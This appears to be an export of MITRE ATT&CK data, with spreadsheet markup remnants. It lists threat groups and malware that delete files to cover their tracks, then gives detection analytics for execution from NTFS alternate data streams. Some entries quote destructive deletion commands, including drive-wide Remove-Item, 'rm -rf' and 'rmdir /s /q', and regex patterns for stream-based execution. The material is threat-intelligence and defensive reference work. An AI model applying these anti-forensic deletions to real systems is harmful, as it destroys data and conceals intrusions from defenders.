APT28
[APT28](https://attack.mitre.org/groups/G0007) has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner.(Citation: DOJ GRU Indictment Jul 2018)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used [SDelete](https://attack.mitre.org/software/S0195) to remove artifacts from victim networks.(Citation: Mandiant No Easy Breach)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has a tool that can delete files.(Citation: FireEye Clandestine Fox)
APT32
[APT32](https://attack.mitre.org/groups/G0050)'s macOS backdoor can receive a “delete” command.(Citation: ESET OceanLotus macOS April 2019)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.(Citation: FireEye APT38 Oct 2018)(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used malware to delete files after they are deployed on a compromised host.(Citation: FBI FLASH APT39 September 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) deleted files from the system.(Citation: FireEye APT41 Aug 2019) 
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has deleted malicious executables from compromised machines.(Citation: CrowdStrike AQUATIC PANDA December 2021)
BRONZE BUTLER
The [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) uploader or malware the uploader uses &lt;code&gt;command&lt;/code&gt; to delete the RAR archives after they have been exfiltrated.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has performed file deletion to evade detection.(Citation: Cycraft Chimera April 2020) 
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) deleted the DLL dropper from the victim’s machine to cover their tracks.(Citation: Talos Cobalt Group July 2018)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.(Citation: US-CERT TA18-074A)
Evilnum
[Evilnum](https://attack.mitre.org/groups/G0120) has deleted files used during infection.(Citation: ESET EvilNum July 2020)
FIN10
[FIN10](https://attack.mitre.org/groups/G0051) has used batch scripts and scheduled tasks to delete critical system files.(Citation: FireEye FIN10 June 2017)
FIN5
[FIN5](https://attack.mitre.org/groups/G0053) uses [SDelete](https://attack.mitre.org/software/S0195) to clean up the environment and attempt to prevent detection.(Citation: Mandiant FIN5 GrrCON Oct 2016)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has removed files from victim machines.(Citation: FireEye FIN6 April 2016)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has deleted tmp and prefetch files during post compromise cleanup activities. [FIN8](https://attack.mitre.org/groups/G0061) has also deleted PowerShell scripts to evade detection on compromised machines.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Symantec FIN8 Jul 2023)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) tools can delete files used during an operation.(Citation: TrendMicro Gamaredon April 2020)(Citation: Symantec Shuckworm January 2022)(Citation: CERT-EE Gamaredon January 2021)
Group5
Malware used by [Group5](https://attack.mitre.org/groups/G0043) is capable of remotely deleting files from victims.(Citation: Citizen Lab Group5)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has deleted the exfiltrated data on disk after transmission. [Kimsuky](https://attack.mitre.org/groups/G0094) has also used an instrumentor script to terminate browser processes running on an infected system and then delete the cookie files on disk.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware has deleted files in various ways, including "suicide scripts" to delete malware binaries from the victim. [Lazarus Group](https://attack.mitre.org/groups/G0032) also uses secure file deletion to delete files from the victim.(Citation: Novetta Blockbuster)(Citation: McAfee GhostSecret)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has deleted and overwrote files to cover tracks.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)(Citation: DFIR Phosphorus November 2021)
Metador
[Metador](https://attack.mitre.org/groups/G1013) has quickly deleted `cbd.exe` from a compromised host following the successful deployment of their malware.(Citation: SentinelLabs Metador Sept 2022) 
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) will delete their tools and files, and kill processes after their objectives are reached.(Citation: Secureworks BRONZE PRESIDENT December 2019)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has deleted files associated with their payload after execution.(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 OopsIE! Feb 2018)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) removed certain files and replaced them so they could not be retrieved.(Citation: TrendMicro Patchwork Dec 2017)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has deleted files on infected machines.(Citation: Anomali Rocke March 2019)	
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used backdoors that can delete files used in an attack from an infected system.(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots July 2017)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has deleted artifacts, including scheduled tasks, communicates files from the C2 and other logs.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: Group IB Silence Sept 2018)	
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) routinely deleted tools, logs, and other files after they were finished with them.(Citation: FireEye TRITON 2019)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has used a payload that removes itself after running. [TeamTNT](https://attack.mitre.org/groups/G0139) also has deleted locally staged files for collecting credentials or scan results for local IP addresses after exfiltrating them.(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Cisco Talos Intelligence Group)
The White Company
[The White Company](https://attack.mitre.org/groups/G0089) has the ability to delete its malware entirely from the target system.(Citation: Cylance Shaheen Nov 2018)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has deleted existing logs and exfiltrated file archives from a victim.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Trend Micro DRBControl February 2020)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has deleted dropper files on an infected system using command scripts.(Citation: TrendMicro Tropic Trooper May 2020)	
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has run `rd /S` to delete their working directories and files.(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used file deletion to remove some modules and configurations from an infected host after use.(Citation: CrowdStrike Grim Spider May 2019)
menuPass
A [menuPass](https://attack.mitre.org/groups/G0045) macro deletes files after it has decoded and decompressed them.(Citation: Accenture Hogfish April 2018)(Citation: District Court of NY APT10 Indictment December 2018)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can delete files and directories.(Citation: ESET Sednit Part 2)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) can self delete its dropper after the malware is successfully deployed.(Citation: Cyberreason Anchor December 2019)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has deleted the MSI file after installation.(Citation: CISA AppleJeus Feb 2021)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can delete files from a compromised host after they are exfiltrated.(Citation: Malwarebytes Kimsuky June 2021)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to delete files and directories on compromised hosts.(Citation: CheckPoint Naikon May 2020)
Attor
[Attor](https://attack.mitre.org/software/S0438)’s plugin deletes the collected files and log files after exfiltration.(Citation: ESET Attor Oct 2019)
AuditCred
[AuditCred](https://attack.mitre.org/software/S0347) can delete files from the system.(Citation: TrendMicro Lazarus Nov 2018)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can delete files from victim machines.(Citation: Unit42 Azorult Nov 2018)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) has the ability to delete PowerShell scripts from a compromised machine.(Citation: Gigamon BADHATCH Jul 2019)
BBSRAT
[BBSRAT](https://attack.mitre.org/software/S0127) can delete files and directories.(Citation: Palo Alto Networks BBSRAT)
BLACKCOFFEE
[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to delete files.(Citation: FireEye APT17)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has deleted itself and associated artifacts from victim machines.(Citation: US-CERT BLINDINGCAN Aug 2020)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can uninstall itself.(Citation: Volexity InkySquid BLUELIGHT August 2021)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has cleaned up all files associated with the secondary payload execution.(Citation: Unit42 BabyShark Apr 2019)
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has the ability to remove files and folders related to previous infections.(Citation: Unit 42 BackConfig May 2020)
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) contains a cleanup module that removes traces of itself from the victim.(Citation: Symantec Dragonfly)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has a command to delete a file.(Citation: CheckPoint Bandook Nov 2020)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system.(Citation: McAfee Bankshot)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can delete its loader using a batch file in the Windows temporary folder.(Citation: NCC Group Team9 June 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) will delete its dropper and VBS scripts from the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can uninstall its loader through the use of a `Sdl` command.(Citation: Proofpoint Bumblebee April 2022)
CARROTBAT
[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to delete downloaded files from a compromised host.(Citation: Unit 42 CARROTBAT November 2018)
CSPY Downloader
[CSPY Downloader](https://attack.mitre.org/software/S0527) has the ability to self delete.(Citation: Cybereason Kimsuky November 2020)
Calisto
[Calisto](https://attack.mitre.org/software/S0274) has the capability to use &lt;code&gt;rm -rf&lt;/code&gt; to remove folders and files from the victim's machine.(Citation: Securelist Calisto July 2018)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) has a command to delete files.(Citation: FireEye CARBANAK June 2017)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) can uninstall itself, including deleting its executable.(Citation: PaloAlto CardinalRat Apr 2017)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can delete created files from a compromised system.(Citation: Check Point APT35 CharmPower January 2022)
Cherry Picker
Recent versions of [Cherry Picker](https://attack.mitre.org/software/S0107) delete files and registry keys created by the malware.(Citation: Trustwave Cherry Picker)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) has the ability to delete files from a compromised host.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)	 
Cryptoistic
[Cryptoistic](https://attack.mitre.org/software/S0498) has the ability delete files from a compromised host.(Citation: SentinelOne Lazarus macOS July 2020)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) can use the command &lt;code&gt;cmd.exe /c del&lt;/code&gt; to delete its artifacts from the system.(Citation: McAfee Cuba April 2021) 
DanBot
[DanBot](https://attack.mitre.org/software/S1014) can delete its configuration file after installation.(Citation: ClearSky Siamesekitten August 2021)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) has been observed deleting its original launcher after installation.(Citation: Prevailion DarkWatchman 2021)
Denis
[Denis](https://attack.mitre.org/software/S0354) has a command to delete files from the victim’s machine.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) is capable of deleting files. It has been observed loading a Linux Kernel Module (LKM) and then deleting it from the hard disk as well as overwriting the data with null bytes.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)
Drovorub
[Drovorub](https://attack.mitre.org/software/S0502) can delete specific files from a compromised host.(Citation: NSA/FBI Drovorub August 2020)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) can remove its persistence and delete itself.(Citation: Securelist Dtrack)
DustySky
[DustySky](https://attack.mitre.org/software/S0062) can delete files it creates from the infected system.(Citation: Kaspersky MoleRATs April 2019)
ECCENTRICBANDWAGON
[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can delete log files generated from the malware stored at &lt;code&gt;C:\windows\temp\tmp0207&lt;/code&gt;.(Citation: CISA EB Aug 2020)
Elise
[Elise](https://attack.mitre.org/software/S0081) is capable of launching a remote shell on the host to delete itself.(Citation: Accenture Dragonfish Jan 2018)
Epic
[Epic](https://attack.mitre.org/software/S0091) has a command to delete a file from the machine.(Citation: Kaspersky Turla Aug 2014)
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396) has deleted the initial dropper after running through the environment checks.(Citation: Cyphort EvilBunny Dec 2014)
Exaramel for Linux
[Exaramel for Linux](https://attack.mitre.org/software/S0401) can uninstall its persistence mechanism and delete its configuration file.(Citation: ANSSI Sandworm January 2021)
FALLCHILL
[FALLCHILL](https://attack.mitre.org/software/S0181) can delete malware and associated artifacts from the victim.(Citation: US-CERT FALLCHILL Nov 2017)
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) deletes the .LNK file from the startup directory as well as the dropper components.(Citation: FireEye FELIXROOT July 2018)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can secure delete its DLL.(Citation: ESET Dukes October 2019)
Ferocious
[Ferocious](https://attack.mitre.org/software/S0679) can delete files from a compromised host.(Citation: Kaspersky WIRTE November 2021)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) can execute batch scripts to delete files.(Citation: Korean FSI TA505 2020)
FruitFly
[FruitFly](https://attack.mitre.org/software/S0277) will delete files on the system.(Citation: objsee mac malware 2017)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can delete files including its dropper component.(Citation: Bitdefender FunnyDream Campaign November 2020)
Fysbis
[Fysbis](https://attack.mitre.org/software/S0410) has the ability to delete files.(Citation: Fysbis Dr Web Analysis)
Gazer
[Gazer](https://attack.mitre.org/software/S0168) has commands to delete files and persistence mechanisms from the victim.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can delete its dropper component from the targeted system.(Citation: ESET Gelsemium June 2021)
Gold Dragon
[Gold Dragon](https://attack.mitre.org/software/S0249) deletes one of its files, 2.hwp, from the endpoint after establishing persistence.(Citation: McAfee Gold Dragon)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493)'s uninstaller can delete registry entries, files and folders, and finally itself once these tasks have been completed.(Citation: Trustwave GoldenSpy2 June 2020)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can delete .LNK files created in the Startup folder.(Citation: ESET Grandoreiro April 2020)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can delete the original executable after initial installation in addition to unused functions.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) 
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) can securely delete a file by hooking into the DeleteFileA and DeleteFileW functions in the Windows API.(Citation: ESET GreyEnergy Oct 2018)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can delete old binaries on a compromised host.(Citation: Group IB GrimAgent July 2021)
GuLoader
[GuLoader](https://attack.mitre.org/software/S0561) can delete its executable from the &lt;code&gt;AppData\Local\Temp&lt;/code&gt; directory on the compromised host.(Citation: Unit 42 NETWIRE April 2020)
HALFBAKED
[HALFBAKED](https://attack.mitre.org/software/S0151) can delete a specified file.(Citation: FireEye FIN7 April 2017)
HAWKBALL
[HAWKBALL](https://attack.mitre.org/software/S0391) has the ability to delete files.(Citation: FireEye HAWKBALL Jun 2019)	
HTTPBrowser
[HTTPBrowser](https://attack.mitre.org/software/S0070) deletes its original installer file once installation is complete.(Citation: ZScaler Hacking Team)
Hancitor
[Hancitor](https://attack.mitre.org/software/S0499) has deleted files using the VBA &lt;code&gt;kill&lt;/code&gt; function.(Citation: FireEye Hancitor)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to overwrite its own file with random bites.(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wizard March 2022)
Heyoka Backdoor
[Heyoka Backdoor](https://attack.mitre.org/software/S1027) has the ability to delete folders and files from a targeted system.(Citation: SentinelOne Aoqin Dragon June 2022)
Hi-Zor
[Hi-Zor](https://attack.mitre.org/software/S0087) deletes its RAT installer file as it executes its DLL payload file.(Citation: Fidelis INOCNATION)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has deleted scripts after execution.(Citation: Unit 42 Hildegard Malware) 
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has the ability to clean up installed files, delete files, and delete itself from the victim’s machine.(Citation: Carbon Black HotCroissant April 2020)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)
HyperBro
[HyperBro](https://attack.mitre.org/software/S0398) has the ability to delete a specified file.(Citation: Unit42 Emissary Panda May 2019)
IceApple
[IceApple](https://attack.mitre.org/software/S1022) can delete files and directories from targeted systems.(Citation: CrowdStrike IceApple May 2022)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has deleted files related to its dynamic debugger feature.(Citation: QiAnXin APT-C-36 Feb2019)
InnaputRAT
[InnaputRAT](https://attack.mitre.org/software/S0259) has a command to delete files.(Citation: ASERT InnaputRAT April 2018)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has deleted files and directories including XML and files successfully uploaded to C2 servers.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
Ixeshe
[Ixeshe](https://attack.mitre.org/software/S0015) has a command to delete a file from the machine.(Citation: Trend Micro IXESHE 2012)
JHUHUGIT
The [JHUHUGIT](https://attack.mitre.org/software/S0044) dropper can delete itself from the victim. Another [JHUHUGIT](https://attack.mitre.org/software/S0044) variant has the capability to delete specified files.(Citation: ESET Sednit Part 1)(Citation: Unit 42 Sofacy Feb 2018)
JPIN
[JPIN](https://attack.mitre.org/software/S0201)'s installer/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.(Citation: Microsoft PLATINUM April 2016)
KEYMARBLE
[KEYMARBLE](https://attack.mitre.org/software/S0271) has the capability to delete files off the victim’s machine.(Citation: US-CERT KEYMARBLE Aug 2018)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) can delete files.(Citation: Talos Konni May 2017)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) can delete files.(Citation: Unit 42 Kazuar May 2017)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can delete files created on the victim's machine.(Citation: Kaspersky Lyceum October 2021)
KillDisk
[KillDisk](https://attack.mitre.org/software/S0607) has the ability to quit and delete itself.(Citation: ESET Telebots Dec 2016)
Kivars
[Kivars](https://attack.mitre.org/software/S0437) has the ability to uninstall malware from the infected host.(Citation: TrendMicro BlackTech June 2017)
Komplex
The [Komplex](https://attack.mitre.org/software/S0162) trojan supports file deletion.(Citation: Sofacy Komplex Trojan)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) has a function to delete files.(Citation: ESET LightNeuron May 2019)
Linfo
[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Linfo May 2012)
LiteDuke
[LiteDuke](https://attack.mitre.org/software/S0513) can securely delete files by first writing random data to the file.(Citation: ESET Dukes October 2019)
LockerGoga
[LockerGoga](https://attack.mitre.org/software/S0372) has been observed deleting its original launcher after execution.(Citation: CarbonBlack LockerGoga 2019)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) will delete its dropped files after bypassing UAC.(Citation: Talos Lokibot Jan 2021)
LookBack
[LookBack](https://attack.mitre.org/software/S0582) removes itself after execution and can delete files on the system.(Citation: Proofpoint LookBack Malware Aug 2019)
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) deleted installation files after completion.(Citation: ESET LoudMiner June 2019)
MESSAGETAP
Once loaded into memory, [MESSAGETAP](https://attack.mitre.org/software/S0443) deletes the keyword_parm.txt and parm.txt configuration files from disk. (Citation: FireEye MESSAGETAP October 2019)
MURKYTOP
[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to delete local files.(Citation: FireEye Periscope March 2018)
MacMa
[MacMa](https://attack.mitre.org/software/S1016) can delete itself from the compromised computer.(Citation: ESET DazzleSpy Jan 2022)
MacSpy
[MacSpy](https://attack.mitre.org/software/S0282) deletes any temporary files it creates(Citation: alientvault macspy)
Machete
Once a file is uploaded, [Machete](https://attack.mitre.org/software/S0409) will delete it from the machine.(Citation: ESET Machete July 2019) 
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has deleted itself from the system after execution.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)
Meteor
[Meteor](https://attack.mitre.org/software/S0688) will delete the folder containing malicious scripts if it detects the hostname as `PIS-APP`, `PIS-MOB`, `WSUSPROXY`, or `PIS-DB`.(Citation: Check Point Meteor Aug 2021)
Milan
[Milan](https://attack.mitre.org/software/S1015) can delete files via `C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 1 -w 3000 &gt; Nul &amp; rmdir /s /q`.(Citation: ClearSky Siamesekitten August 2021)
Misdat
[Misdat](https://attack.mitre.org/software/S0083) is capable of deleting the backdoor file.(Citation: Cylance Dust Storm)
MoonWind
[MoonWind](https://attack.mitre.org/software/S0149) can delete itself or specified files.(Citation: Palo Alto MoonWind March 2017)
More_eggs
[More_eggs](https://attack.mitre.org/software/S0284) can remove itself from a system.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)
Mori
[Mori](https://attack.mitre.org/software/S1047) can delete its DLL file and related files by Registry value.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256) deletes files using DeleteFileW API call.(Citation: ESET Turla Mosquito Jan 2018)
NOKKI
[NOKKI](https://attack.mitre.org/software/S0353) can delete files to cover tracks.(Citation: Unit 42 NOKKI Sept 2018)
NanHaiShu
[NanHaiShu](https://attack.mitre.org/software/S0228) launches a script to delete their original decoy file to cover tracks.(Citation: fsecure NanHaiShu July 2016)
Nebulae
[Nebulae](https://attack.mitre.org/software/S0630) has the ability to delete files and directories.(Citation: Bitdefender Naikon April 2021)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a command to delete a file from the system. [OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) deletes the app bundle and dropper after execution.(Citation: TrendMicro MacOS April 2018)(Citation: Trend Micro MacOS Backdoor November 2020)(Citation: Unit42 OceanLotus 2017)
OceanSalt
[OceanSalt](https://attack.mitre.org/software/S0346) can delete files from the system.(Citation: McAfee Oceansalt Oct 2018)
Okrum
[Okrum](https://attack.mitre.org/software/S0439)'s backdoor deletes files after they have been successfully uploaded to C2 servers.(Citation: ESET Okrum July 2019)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) has the capability to delete files and scripts from the victim's machine.(Citation: Unit 42 OilRig Sept 2018)
OutSteel
[OutSteel](https://attack.mitre.org/software/S1017) can delete itself following the successful execution of a follow-on payload.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
P.A.S. Webshell
[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can delete scripts from a subdirectory of /tmp after they are run.(Citation: ANSSI Sandworm January 2021)
PLEAD
[PLEAD](https://attack.mitre.org/software/S0435) has the ability to delete files on the compromised host.(Citation: TrendMicro BlackTech June 2017)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) can delete all files on the C:\, D:\, E:\ and, F:\ drives using [PowerShell](https://attack.mitre.org/techniques/T1059/001) Remove-Item commands.(Citation: FireEye MuddyWater Mar 2018)
PUNCHBUGGY
[PUNCHBUGGY](https://attack.mitre.org/software/S0196) can delete files written to disk.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Morphisec ShellTea June 2019)
Pasam
[Pasam](https://attack.mitre.org/software/S0208) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Pasam May 2012)
Pay2Key
[Pay2Key](https://attack.mitre.org/software/S0556) can remove its log file from disk.(Citation: Check Point Pay2Key November 2020)
PcShare
[PcShare](https://attack.mitre.org/software/S1050) has deleted its files and components from a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)
Penquin
[Penquin](https://attack.mitre.org/software/S0587) can delete downloaded executables after running them.(Citation: Leonardo Turla Penquin May 2020)
Pillowmint
[Pillowmint](https://attack.mitre.org/software/S0517) has deleted the filepath &lt;code&gt;%APPDATA%\Intel\devmonsrv.exe&lt;/code&gt;.(Citation: Trustwave Pillowmint June 2020)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has the ability to overwrite scripts and delete itself if a sandbox environment is detected.(Citation: Talos PoetRAT April 2020)
Pony
[Pony](https://attack.mitre.org/software/S0453) has used scripts to delete itself after execution.(Citation: Malwarebytes Pony April 2016)	
PowerDuke
[PowerDuke](https://attack.mitre.org/software/S0139) has a command to write random data across a file and delete it.(Citation: Volexity PowerDuke November 2016)
PowerShower
[PowerShower](https://attack.mitre.org/software/S0441) has the ability to remove all files created during the dropper process.(Citation: Unit 42 Inception November 2018)
Prikormka
After encrypting its own log files, the log encryption module in [Prikormka](https://attack.mitre.org/software/S0113) deletes the original, unencrypted files from the host.(Citation: ESET Operation Groundbait)
ProLock
[ProLock](https://attack.mitre.org/software/S0654) can remove files containing its payload after they are executed.(Citation: Group IB Ransomware September 2020)
Proton
[Proton](https://attack.mitre.org/software/S0279) removes all files in the /tmp directory.(Citation: objsee mac malware 2017)
Proxysvc
[Proxysvc](https://attack.mitre.org/software/S0238) can delete files indicated by the attacker and remove itself from disk using a batch file.(Citation: McAfee GhostSecret)
Pteranodon
[Pteranodon](https://attack.mitre.org/software/S0147) can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.(Citation: Palo Alto Gamaredon Feb 2017)
PyDCrypt
[PyDCrypt](https://attack.mitre.org/software/S1032) will remove all created artifacts such as dropped executables.(Citation: Checkpoint MosesStaff Nov 2021)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) has deleted batch files after execution. (Citation: CERT-FR PYSA April 2020) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
The Streams tool of Sysinternals can be used to uncover files with ADSs. The &lt;code&gt;dir /r&lt;/code&gt; command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a &lt;code&gt;-stream&lt;/code&gt; parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
&lt;h4&gt;Analytic 1 - NTFS Alternate Data Stream Execution : System Utilities (Powershell)&lt;/h4&gt;
&lt;code&gt;ads_processes = filter processes where (event_id = 1 exe = "C:\\Windows\\*\\powershell.exe" AND command_line = "Invoke-CimMethod\s+-ClassName\s+Win32_Process\s+-MethodName\s+Create.*\b(\w+(\.\w+)?):(\w+(\.\w+)?)|-ep bypass\s+-\s+&lt;.*\b(\w+(\.\w+)?):(\w+(\.\w+)?)|-command.*Get-Content.*-Stream.*Set-Content.*start-process .*(\w+(\.\w+)?)"&lt;/code&gt;
&lt;h4&gt;Analytic 2 - NTFS Alternate Data Stream Execution : System Utilities (WMIC)&lt;/h4&gt;
&lt;code&gt;ads_processes = filter processes where (event_id = 1 exe = "C:\\Windows\\*\\wmic.exe" AND command_line = "process call create.*\"(\w+(\.\w+)?):(\w+(\.\w+)?)"&lt;code&gt;
&lt;h4&gt;Analytic 3 - NTFS Alternate Data Stream Execution : System Utilities (rundll32)&lt;/h4&gt;
&lt;code&gt;ads_processes = filter processes where (event_id = 1 exe = "C:\\Windows\\*\\rundll32.exe" AND command_line = "\"?(\w+(\.\w+)?):(\w+(\.\w+)?)?\"?,\w+\|(advpack\.dll\|ieadvpack\.dll),RegisterOCX\s+(\w+\.\w+):(\w+(\.\w+)?)\|(shdocvw\.dll\|ieframe\.dll),OpenURL.*(\w+\.\w+):(\w+(\.\w+)?)"&lt;/code&gt;
&lt;h4&gt;Analytic 4 - NTFS Alternate Data Stream Execution : System Utilities (wscript/cscript)&lt;/h4&gt;
&lt;code&gt;ads_processes = filter processes where (event_id = 1 exe = "C:\\Windows\\*\\wscript.exe" OR exe = "C:\\Windows\\*\\cscript.exe)" AND command_line = "(?&lt;!\/)\b\w+(\.\w+)?:\w+(\.\w+)?$"&lt;/code&gt;
File Metadata
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, may use NTFS file attributes to hide their malicious data in order to evade detection. Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA)
File Modification
